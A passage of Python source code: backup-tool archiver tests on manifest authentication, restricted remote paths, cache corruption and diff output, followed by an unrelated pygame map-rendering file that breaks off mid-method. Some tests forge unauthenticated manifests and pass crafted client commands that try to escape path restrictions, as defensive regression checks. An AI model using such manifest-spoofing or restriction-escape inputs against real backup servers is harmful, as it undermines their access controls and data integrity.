                archive.save()
        self.cmd('check', self.repository_location, exit_code=0)
        self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
    """Tests for TAM (tertiary authentication mechanism) protection of the manifest."""
    def spoof_manifest(self, repository):
        """Replace the manifest with an unauthenticated (no-TAM) one, as a pre-1.0.9 attacker could."""
        with repository:
            _, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
                'version': 1,
                'archives': {},
                'config': {},
                # future timestamp so the spoofed manifest would win a freshness comparison
                'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
            })))
            repository.commit(compact=False)
    def test_fresh_init_tam_required(self):
        """A freshly initialized repo must reject a manifest written without a TAM."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
                'version': 1,
                'archives': {},
                'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
            })))
            repository.commit(compact=False)
        with pytest.raises(TAMRequiredError):
            self.cmd('list', self.repository_location)
    def test_not_required(self):
        """Repo downgraded to tam_required=False accepts an unauthenticated manifest until upgraded."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            # also remove the cached security state so the downgrade is not detected there
            shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
            _, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            key.tam_required = False
            key.change_passphrase(key._passphrase)
            manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
            del manifest[b'tam']
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
            repository.commit(compact=False)
        output = self.cmd('list', '--debug', self.repository_location)
        assert 'archive1234' in output
        assert 'TAM not found and not required' in output
        # Run upgrade
        self.cmd('upgrade', '--tam', self.repository_location)
        # Manifest must be authenticated now
        output = self.cmd('list', '--debug', self.repository_location)
        assert 'archive1234' in output
        assert 'TAM-verified manifest' in output
        # Try to spoof / modify pre-1.0.9
        self.spoof_manifest(repository)
        # Fails
        with pytest.raises(TAMRequiredError):
            self.cmd('list', self.repository_location)
        # Force upgrade
        self.cmd('upgrade', '--tam', '--force', self.repository_location)
        self.cmd('list', self.repository_location)
    def test_disable(self):
        """With TAM disabled before spoofing, a spoofed (empty) manifest is silently accepted."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        self.cmd('upgrade', '--disable-tam', self.repository_location)
        repository = Repository(self.repository_path, exclusive=True)
        self.spoof_manifest(repository)
        assert not self.cmd('list', self.repository_location)
    def test_disable2(self):
        """Same as test_disable, but spoof first and disable TAM afterwards."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        repository = Repository(self.repository_path, exclusive=True)
        self.spoof_manifest(repository)
        self.cmd('upgrade', '--disable-tam', self.repository_location)
        assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
    """Re-run the archiver tests through the ssh:// RPC layer (RemoteRepository)."""
    # repository locations get this prefix so they are routed through the remote test transport
    prefix = '__testsuite__:'
    def open_repository(self):
        """Open the test repository through the remote (RPC) code path."""
        return RemoteRepository(Location(self.repository_location))
    def test_remote_repo_restrict_to_path(self):
        """borg serve --restrict-to-path must only allow repos at/below the given paths."""
        # restricted to repo directory itself:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        # restricted to repo directory itself, fail for other directories with same prefix:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
        # restricted to a completely different path:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
        path_prefix = os.path.dirname(self.repository_path)
        # restrict to repo directory's parent directory:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
            self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
        # restrict to repo directory's parent directory and another directory:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
            self.cmd('init', '--encryption=repokey', self.repository_location + '_3')
    def test_remote_repo_restrict_to_repository(self):
        """borg serve --restrict-to-repository must only allow exactly the given repository."""
        # restricted to repo directory itself:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        # the parent directory is NOT the repository itself, so this must fail:
        parent_path = os.path.join(self.repository_path, '..')
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location)
    @unittest.skip('only works locally')
    def test_debug_put_get_delete_obj(self):
        pass
    @unittest.skip('only works locally')
    def test_config(self):
        pass
    @unittest.skip('only works locally')
    def test_migrate_lock_alive(self):
        pass
    def test_strip_components_doesnt_leak(self):
        """Remote extract with --strip-components must not leave cached RPC responses behind."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('dir/file', contents=b"test file contents 1")
        self.create_regular_file('dir/file2', contents=b"test file contents 2")
        self.create_regular_file('skipped-file1', contents=b"test file contents 3")
        self.create_regular_file('skipped-file2', contents=b"test file contents 4")
        self.create_regular_file('skipped-file3', contents=b"test file contents 5")
        self.cmd('create', self.repository_location + '::test', 'input')
        # this debug marker appears in output if responses were left queued in RemoteRepository
        marker = 'cached responses left in RemoteRepository'
        with changedir('output'):
            res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
            self.assert_true(marker not in res)
            with self.assert_creates_file('file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
                self.assert_true(marker not in res)
            with self.assert_creates_file('dir/file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
                self.assert_true(marker not in res)
            with self.assert_creates_file('input/dir/file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
                self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
    """Tests for detection of and recovery from corruption in the local cache."""
    def setUp(self):
        """Create a repo and remember its cache directory path (from 'borg info --json')."""
        super().setUp()
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']
    def corrupt(self, file, amount=1):
        """Flip the last *amount* bytes of *file* in place (bitwise complement)."""
        with open(file, 'r+b') as fd:
            fd.seek(-amount, io.SEEK_END)
            corrupted = bytes(255-c for c in fd.read(amount))
            fd.seek(-amount, io.SEEK_END)
            fd.write(corrupted)
    def test_cache_chunks(self):
        """A corrupted chunks cache must raise FileIntegrityError (rc 2 when forked)."""
        self.corrupt(os.path.join(self.cache_path, 'chunks'))
        if self.FORK_DEFAULT:
            out = self.cmd('info', self.repository_location, exit_code=2)
            assert 'failed integrity check' in out
        else:
            with pytest.raises(FileIntegrityError):
                self.cmd('info', self.repository_location)
    def test_cache_files(self):
        """A corrupted files cache is only a warning; borg continues without it."""
        self.cmd('create', self.repository_location + '::test', 'input')
        self.corrupt(os.path.join(self.cache_path, 'files'))
        out = self.cmd('create', self.repository_location + '::test1', 'input')
        # borg warns about the corrupt files cache, but then continues without files cache.
        assert 'files cache is corrupted' in out
    def test_chunks_archive(self):
        """A corrupted per-archive chunk index is detected during cache sync and rebuilt."""
        self.cmd('create', self.repository_location + '::test1', 'input')
        # Find ID of test1 so we can corrupt it later :)
        target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
        self.cmd('create', self.repository_location + '::test2', 'input')
        # Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
        self.cmd('delete', '--cache-only', self.repository_location)
        self.cmd('info', self.repository_location, '--json')
        chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
        assert len(os.listdir(chunks_archive)) == 4  # two archives, one chunks cache and one .integrity file each
        self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
        # Trigger cache sync by changing the manifest ID in the cache config
        config_path = os.path.join(self.cache_path, 'config')
        config = ConfigParser(interpolation=None)
        config.read(config_path)
        config.set('cache', 'manifest', bin_to_hex(bytes(32)))
        with open(config_path, 'w') as fd:
            config.write(fd)
        # Cache sync notices corrupted archive chunks, but automatically recovers.
        out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
        assert 'Reading cached archive chunk index for test1' in out
        assert 'Cached archive chunk index of test1 is corrupted' in out
        assert 'Fetching and building archive index for test1' in out
    def test_old_version_interfered(self):
        # Modify the main manifest ID without touching the manifest ID in the integrity section.
        # This happens if a version without integrity checking modifies the cache.
        config_path = os.path.join(self.cache_path, 'config')
        config = ConfigParser(interpolation=None)
        config.read(config_path)
        config.set('cache', 'manifest', bin_to_hex(bytes(32)))
        with open(config_path, 'w') as fd:
            config.write(fd)
        out = self.cmd('info', self.repository_location)
        assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
    """Tests for 'borg diff' between two archives."""
    def test_basic_functionality(self):
        """Create two snapshots covering add/remove/replace of files, dirs, links; verify diff output."""
        # Setup files for the first snapshot
        self.create_regular_file('empty', size=0)
        self.create_regular_file('file_unchanged', size=128)
        self.create_regular_file('file_removed', size=256)
        self.create_regular_file('file_removed2', size=512)
        self.create_regular_file('file_replaced', size=1024)
        os.mkdir('input/dir_replaced_with_file')
        os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
        os.mkdir('input/dir_removed')
        if are_symlinks_supported():
            os.mkdir('input/dir_replaced_with_link')
            os.symlink('input/dir_replaced_with_file', 'input/link_changed')
            os.symlink('input/file_unchanged', 'input/link_removed')
            os.symlink('input/file_removed2', 'input/link_target_removed')
            os.symlink('input/empty', 'input/link_target_contents_changed')
            os.symlink('input/empty', 'input/link_replaced_by_file')
        if are_hardlinks_supported():
            os.link('input/file_replaced', 'input/hardlink_target_replaced')
            os.link('input/empty', 'input/hardlink_contents_changed')
            os.link('input/file_removed', 'input/hardlink_removed')
            os.link('input/file_removed2', 'input/hardlink_target_removed')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # Create the first snapshot
        self.cmd('create', self.repository_location + '::test0', 'input')
        # Setup files for the second snapshot
        self.create_regular_file('file_added', size=2048)
        self.create_regular_file('file_empty_added', size=0)
        os.unlink('input/file_replaced')
        self.create_regular_file('file_replaced', contents=b'0' * 4096)
        os.unlink('input/file_removed')
        os.unlink('input/file_removed2')
        os.rmdir('input/dir_replaced_with_file')
        self.create_regular_file('dir_replaced_with_file', size=8192)
        os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
        os.mkdir('input/dir_added')
        os.rmdir('input/dir_removed')
        if are_symlinks_supported():
            os.rmdir('input/dir_replaced_with_link')
            os.symlink('input/dir_added', 'input/dir_replaced_with_link')
            os.unlink('input/link_changed')
            os.symlink('input/dir_added', 'input/link_changed')
            os.symlink('input/dir_added', 'input/link_added')
            os.unlink('input/link_replaced_by_file')
            self.create_regular_file('link_replaced_by_file', size=16384)
            os.unlink('input/link_removed')
        if are_hardlinks_supported():
            os.unlink('input/hardlink_removed')
            os.link('input/file_added', 'input/hardlink_added')
        with open('input/empty', 'ab') as fd:
            fd.write(b'appended_data')
        # Create the second snapshot
        self.cmd('create', self.repository_location + '::test1a', 'input')
        self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')
        def do_asserts(output, can_compare_ids):
            # can_compare_ids is False when chunker params differ between the archives,
            # forcing a content comparison instead of a chunk-id comparison
            # File contents changed (deleted and replaced with a new file)
            change = 'B' if can_compare_ids else '{:<19}'.format('modified')
            assert 'file_replaced' in output  # added to debug #3494
            assert '{} input/file_replaced'.format(change) in output
            # File unchanged
            assert 'input/file_unchanged' not in output
            # Directory replaced with a regular file
            if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
                assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
            # Basic directory cases
            assert 'added directory input/dir_added' in output
            assert 'removed directory input/dir_removed' in output
            if are_symlinks_supported():
                # Basic symlink cases
                assert 'changed link input/link_changed' in output
                assert 'added link input/link_added' in output
                assert 'removed link input/link_removed' in output
                # Symlink replacing or being replaced
                assert '] input/dir_replaced_with_link' in output
                assert '] input/link_replaced_by_file' in output
                # Symlink target removed. Should not affect the symlink at all.
                assert 'input/link_target_removed' not in output
            # The inode has two links and the file contents changed. Borg
            # should notice the changes in both links. However, the symlink
            # pointing to the file is not changed.
            change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
            assert '{} input/empty'.format(change) in output
            if are_hardlinks_supported():
                assert '{} input/hardlink_contents_changed'.format(change) in output
            if are_symlinks_supported():
                assert 'input/link_target_contents_changed' not in output
            # Added a new file and a hard link to it. Both links to the same
            # inode should appear as separate files.
            assert 'added 2.05 kB input/file_added' in output
            if are_hardlinks_supported():
                assert 'added 2.05 kB input/hardlink_added' in output
            # check if a diff between non-existent and empty new file is found
            assert 'added 0 B input/file_empty_added' in output
            # The inode has two links and both of them are deleted. They should
            # appear as two deleted files.
            assert 'removed 256 B input/file_removed' in output
            if are_hardlinks_supported():
                assert 'removed 256 B input/hardlink_removed' in output
            # Another link (marked previously as the source in borg) to the
            # same inode was removed. This should not change this link at all.
            if are_hardlinks_supported():
                assert 'input/hardlink_target_removed' not in output
            # Another link (marked previously as the source in borg) to the
            # same inode was replaced with a new regular file. This should not
            # change this link at all.
            if are_hardlinks_supported():
                assert 'input/hardlink_target_replaced' not in output
        do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
        # We expect exit_code=1 due to the chunker params warning
        do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)
    def test_sort_option(self):
        """diff --sort must emit changed paths in alphabetical order."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('a_file_removed', size=8)
        self.create_regular_file('f_file_removed', size=16)
        self.create_regular_file('c_file_changed', size=32)
        self.create_regular_file('e_file_changed', size=64)
        self.cmd('create', self.repository_location + '::test0', 'input')
        os.unlink('input/a_file_removed')
        os.unlink('input/f_file_removed')
        os.unlink('input/c_file_changed')
        os.unlink('input/e_file_changed')
        self.create_regular_file('c_file_changed', size=512)
        self.create_regular_file('e_file_changed', size=1024)
        self.create_regular_file('b_file_added', size=128)
        self.create_regular_file('d_file_added', size=256)
        self.cmd('create', self.repository_location + '::test1', 'input')
        output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
        expected = [
            'a_file_removed',
            'b_file_added',
            'c_file_changed',
            'd_file_added',
            'e_file_changed',
            'f_file_removed',
        ]
        # output lines must mention the expected names in this exact order
        assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
    """borg serve forced-command parsing must resist overrides coming from the client side."""
    archiver = Archiver()

    def forced(server_argv, client_command):
        # first param is argv as produced by the ssh forced command,
        # second param is like from the SSH_ORIGINAL_COMMAND env variable
        return archiver.get_args(server_argv, client_command)

    # everything normal
    args = forced(['borg', 'serve', '--umask=0027', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
                  'borg serve --info')
    assert args.func == archiver.do_serve
    assert args.restrict_to_paths == ['/p1', '/p2']
    assert args.umask == 0o027
    assert args.log_level == 'info'
    # similar, but with --restrict-to-repository
    args = forced(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
                  'borg serve --info --umask=0027')
    assert args.restrict_to_repositories == ['/r1', '/r2']
    # trying to cheat - break out of path restriction
    args = forced(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
                  'borg serve --restrict-to-path=/')
    assert args.restrict_to_paths == ['/p1', '/p2']
    # trying to cheat - break out of repository restriction
    args = forced(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
                  'borg serve --restrict-to-repository=/')
    assert args.restrict_to_repositories == ['/r1', '/r2']
    # trying to cheat - break below repository restriction
    args = forced(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
                  'borg serve --restrict-to-repository=/r1/below')
    assert args.restrict_to_repositories == ['/r1', '/r2']
    # trying to cheat - try to execute different subcommand
    args = forced(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
                  'borg init --encryption=repokey /')
    assert args.func == archiver.do_serve
    # Check that environment variables in the forced command don't cause issues. If the command
    # were not forced, environment variables would be interpreted by the shell, but this does not
    # happen for forced commands - we get the verbatim command line and need to deal with env vars.
    args = forced(['borg', 'serve', ],
                  'BORG_FOO=bar borg serve --info')
    assert args.func == archiver.do_serve
def test_chunk_content_equal():
    """ItemDiff._chunk_content_equal must compare concatenated contents, independent of chunking."""
    def contents_equal(left, right):
        # materialize both sides so fresh iterators can be handed out twice,
        # then require the comparison to be symmetric in its arguments
        left_chunks = list(left)
        right_chunks = list(right)
        forward = ItemDiff._chunk_content_equal(iter(left_chunks), iter(right_chunks))
        backward = ItemDiff._chunk_content_equal(iter(right_chunks), iter(left_chunks))
        assert forward == backward
        return forward

    # same bytes, different chunk boundaries
    assert contents_equal([b'1234', b'567A', b'bC'],
                          [b'1', b'23', b'4567A', b'b', b'C'])
    # one iterator exhausted before the other
    assert not contents_equal([b'12345'],
                              [b'1234', b'56'])
    # content mismatch
    assert not contents_equal([b'1234', b'65'],
                              [b'1234', b'56'])
    # first is the prefix of second
    assert not contents_equal([b'1234', b'56'],
                              [b'1234', b'565'])
class TestBuildFilter:
    """Tests for Archiver.build_filter (item inclusion predicate used during extract)."""
    @staticmethod
    def peek_and_store_hardlink_masters(item, matched):
        # no-op stand-in for the hardlink-master bookkeeping callback
        pass
    def test_basic(self):
        """An Include pattern matches the path itself and everything below it."""
        matcher = PatternMatcher()
        matcher.add([parse_pattern('included')], IECommand.Include)
        # renamed from 'filter' to avoid shadowing the builtin filter()
        item_filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
        assert item_filter(Item(path='included'))
        assert item_filter(Item(path='included/file'))
        assert not item_filter(Item(path='something else'))
    def test_empty(self):
        """With no patterns and fallback=True, every item passes."""
        matcher = PatternMatcher(fallback=True)
        item_filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
        assert item_filter(Item(path='anything'))
    def test_strip_components(self):
        """Items whose path has no components left after stripping must be filtered out."""
        matcher = PatternMatcher(fallback=True)
        item_filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
        assert not item_filter(Item(path='shallow'))
        assert not item_filter(Item(path='shallow/'))  # can this even happen? paths are normalized...
        assert item_filter(Item(path='deep enough/file'))
        assert item_filter(Item(path='something/dir/file'))
class TestCommonOptions:
    """Tests for Archiver.CommonOptions: common flags usable both before and
    after the subcommand, with the later (suffixed) occurrence taking
    precedence when resolve() merges them."""
    @staticmethod
    def define_common_options(add_common_option):
        # Registers a representative sample of option kinds: store_const
        # (two flags sharing one dest), append, store_true and a typed int.
        add_common_option('-h', '--help', action='help', help='show this help message and exit')
        add_common_option('--critical', dest='log_level', help='foo',
                          action='store_const', const='critical', default='warning')
        add_common_option('--error', dest='log_level', help='foo',
                          action='store_const', const='error', default='warning')
        add_common_option('--append', dest='append', help='foo',
                          action='append', metavar='TOPIC', default=[])
        add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
        add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
                          help='(default: %(default)d).')
    @pytest.fixture
    def basic_parser(self):
        # Top-level parser; '_level0' options win over '_level1' per
        # suffix_precedence ordering.
        parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
        parser.common_options = Archiver.CommonOptions(self.define_common_options,
                                                       suffix_precedence=('_level0', '_level1'))
        return parser
    @pytest.fixture
    def subparsers(self, basic_parser):
        if sys.version_info >= (3, 7):
            # py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
            return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
        else:
            # py36 does not support required=... argument (but behaves like required=False).
            # note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
            return basic_parser.add_subparsers(title='required arguments', metavar='<command>')
    @pytest.fixture
    def parser(self, basic_parser):
        # '_level0' group (before the subcommand) also provides the defaults.
        basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
        return basic_parser
    @pytest.fixture
    def common_parser(self, parser):
        # '_level1' group is attached to a parent parser shared by subcommands
        # (flags given after the subcommand).
        common_parser = argparse.ArgumentParser(add_help=False, prog='test')
        parser.common_options.add_common_group(common_parser, '_level1')
        return common_parser
    @pytest.fixture
    def parse_vars_from_line(self, parser, subparsers, common_parser):
        # Returns a helper that parses a command line, resolves the layered
        # common options, and hands back vars(args) for easy comparison.
        subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
                                          description='foo', epilog='bar', help='baz',
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=1234)
        subparser.add_argument('--append-only', dest='append_only', action='store_true')
        def parse_vars_from_line(*line):
            print(line)
            args = parser.parse_args(line)
            parser.common_options.resolve(args)
            return vars(args)
        return parse_vars_from_line
    def test_simple(self, parse_vars_from_line):
        assert parse_vars_from_line('--error') == {
            'append': [],
            'lock_wait': 1,
            'log_level': 'error',
            'progress': False
        }
        # The post-subcommand occurrence ('_level1') wins over the earlier one.
        assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
            'append': [],
            'lock_wait': 1,
            'log_level': 'critical',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }
        # --append-only only exists on the subcommand, not before it.
        with pytest.raises(SystemExit):
            parse_vars_from_line('--append-only', 'subcommand')
        # append-actions accumulate across both positions.
        assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
            'append': ['foo', 'bar', 'baz'],
            'lock_wait': 1,
            'log_level': 'warning',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }
    @pytest.mark.parametrize('position', ('before', 'after', 'both'))
    @pytest.mark.parametrize('flag,args_key,args_value', (
        ('-p', 'progress', True),
        ('--lock-wait=3', 'lock_wait', 3),
    ))
    def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
        # A common flag must have the same effect no matter where it appears.
        line = []
        if position in ('before', 'both'):
            line.append(flag)
        line.append('subcommand')
        if position in ('after', 'both'):
            line.append(flag)
        result = {
            'append': [],
            'lock_wait': 1,
            'log_level': 'warning',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }
        result[args_key] = args_value
        assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
    """Quota strings use decimal (SI) multipliers and reject tiny values."""
    expected = 50 * 10 ** 6  # '50M' means 50 million bytes (SI), not 50 MiB
    assert parse_storage_quota('50M') == expected
    with pytest.raises(argparse.ArgumentTypeError):
        parse_storage_quota('5M')
def get_all_parsers():
    """
    Return dict mapping command to parser.
    """
    top_parser = Archiver(prog='borg').build_parser()
    borgfs_parser = Archiver(prog='borgfs').build_parser()
    parsers = {}
    def discover_level(prefix, parser, extra_choices=None):
        # Collect the sub-parsers reachable one level below `parser`,
        # keyed by their full (prefixed) command name.
        choices = {}
        for action in parser._actions:
            if action.choices is not None and 'SubParsersAction' in str(action.__class__):
                for cmd, sub_parser in action.choices.items():
                    choices[prefix + cmd] = sub_parser
        if extra_choices is not None:
            choices.update(extra_choices)
        if prefix and not choices:
            return
        for command, sub_parser in sorted(choices.items()):
            # Recurse first so nested commands are registered too.
            discover_level(command + " ", sub_parser)
            parsers[command] = sub_parser
    discover_level("", top_parser, {'borgfs': borgfs_parser})
    return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
    # A lazily-rendered RST epilog must at least carry non-empty source text.
    if isinstance(parser.epilog, RstToTextLazy):
        assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
    # Every registered help topic must render to terminal text without error.
    assert str(rst_to_terminal(helptext))
|
entities.py
|
import game
import settings
import pygame
import threading
import pypboy.data
class Map(game.Entity):
    """Scrollable map entity.

    Map data is fetched/loaded via pypboy.data.Maps in a background thread
    and drawn onto an off-screen surface; only `_render_rect` of it is
    blitted onto the entity's image.
    """
    _mapper = None        # pypboy.data.Maps instance
    _transposed = None
    _size = 0             # side length of the (square) map surface, px
    _fetching = None      # background worker thread, if any
    _map_surface = None   # full off-screen render target
    _loading_size = 0
    _render_rect = None   # visible sub-rectangle of _map_surface

    def __init__(self, width, render_rect=None, loading_type="Loading map...", *args, **kwargs):
        self._mapper = pypboy.data.Maps()
        self._size = width
        self._map_surface = pygame.Surface((width, width))
        self._render_rect = render_rect
        super(Map, self).__init__((width, width), *args, **kwargs)
        # Show a placeholder message until the first redraw_map() happens.
        text = settings.RobotoB[14].render(loading_type, True, (settings.bright), (0, 0, 0))
        self.image.blit(text, (10, 10))

    def fetch_map(self, position, radius, isWorld):
        """Fetch map data around `position` in a background thread."""
        self._fetching = threading.Thread(target=self._internal_fetch_map, args=(position, radius, isWorld))
        self._fetching.start()

    def _internal_fetch_map(self, position, radius, isWorld):
        self._mapper.fetch_by_coordinate(position, radius, isWorld)
        self.redraw_map()

    def load_map(self, position, radius, isWorld):
        """Load previously stored map data in a background thread."""
        self._fetching = threading.Thread(target=self._internal_load_map, args=(position, radius, isWorld))
        self._fetching.start()

    def _internal_load_map(self, position, radius, isWorld):
        self._mapper.load_map_coordinates(position, radius, isWorld)
        self.redraw_map()

    def move_map(self, x, y):
        """Pan the visible window by (x, y) pixels."""
        self._render_rect.move_ip(x, y)

    def redraw_map(self, coef=1):
        """Redraw ways and tagged amenities, then blit the visible area.

        `coef` scales the transposed coordinate space (zoom factor).
        """
        self._map_surface.fill((0, 0, 0))
        for way in self._mapper.transpose_ways((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
            pygame.draw.lines(
                self._map_surface,
                (settings.mid),  # Map line Color
                False,
                way,
                2
            )
        for tag in self._mapper.transpose_tags((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
            if tag[3] in settings.AMENITIES:
                # BUG FIX: pygame.transform.scale returns a *new* surface; the
                # original discarded the result and blitted the unscaled icon.
                image = pygame.transform.scale(settings.AMENITIES[tag[3]], (10, 10))
                self._map_surface.blit(image, (tag[1], tag[2]))
                text = settings.RobotoB[12].render(tag[0], True, (settings.bright), (0, 0, 0))
                self._map_surface.blit(text, (tag[1] + 17, tag[2] + 4))
            # Unknown amenities previously selected MAP_ICONS['misc'] but never
            # drew it; they are intentionally skipped here.
        self.image.blit(self._map_surface, (0, 0), area=self._render_rect)
class MapSquare(game.Entity):
    """One grid tile of a MapGrid: fetches and renders its own map chunk."""
    _mapper = None        # pypboy.data.Maps instance
    _size = 0             # tile side length in pixels
    _fetching = None      # background fetch thread, if any
    _map_surface = None   # off-screen surface (2x tile size)
    map_position = (0, 0)  # lat/lon-style grid coordinate of this tile
    def __init__(self, size, map_position, parent, *args, **kwargs):
        self._mapper = pypboy.data.Maps()
        self._size = size
        self.parent = parent
        # Surface is twice the tile size; redraw blits it back shifted by
        # -size/2 so the tile shows the centre portion.
        self._map_surface = pygame.Surface((size * 2, size * 2))
        self.map_position = map_position
        self.tags = {}
        super(MapSquare, self).__init__((size, size), *args, **kwargs)
    def fetch_map(self):
        # Fetch in a background thread so the UI does not block.
        self._fetching = threading.Thread(target=self._internal_fetch_map)
        self._fetching.start()
    def _internal_fetch_map(self):
        self._mapper.fetch_grid(self.map_position)
        self.redraw_map()
        # Tell the owning grid to recomposite now that this tile changed.
        self.parent.redraw_map()
    def redraw_map(self, coef=1):
        """Render ways onto the tile surface and collect tag positions.

        Tag coordinates are stored in absolute (grid) space by offsetting
        with this tile's position.
        """
        self._map_surface.fill((0, 0, 0))
        for way in self._mapper.transpose_ways((self._size, self._size), (self._size / 2, self._size / 2)):
            pygame.draw.lines(
                self._map_surface,
                (settings.mid),
                False,
                way,
                1
            )
        for tag in self._mapper.transpose_tags((self._size, self._size), (self._size / 2, self._size / 2)):
            self.tags[tag[0]] = (tag[1] + self.position[0], tag[2] + self.position[1], tag[3])
        self.image.fill((0, 0, 0))
        self.image.blit(self._map_surface, (-self._size / 2, -self._size / 2))
class MapGrid(game.Entity):
    """A grid of MapSquare tiles centred on a starting coordinate."""
    _grid = None                 # list of MapSquare tiles
    _delta = 0.002               # coordinate step between adjacent tiles
    _starting_position = (0, 0)  # grid-centre coordinate

    def __init__(self, starting_position, dimensions, *args, **kwargs):
        self._grid = []
        self._starting_position = starting_position
        self.dimensions = dimensions
        self._tag_surface = pygame.Surface(dimensions)
        super(MapGrid, self).__init__(dimensions, *args, **kwargs)
        self.tags = {}
        self.fetch_outwards()

    def test_fetch(self):
        """Debug helper: fetch a fixed 10x5 block of tiles."""
        for x in range(10):
            for y in range(5):
                square = MapSquare(
                    100,
                    (
                        self._starting_position[0] + (self._delta * x),
                        self._starting_position[1] - (self._delta * y)
                    ),
                    self  # BUG FIX: MapSquare requires a parent; it was omitted
                )
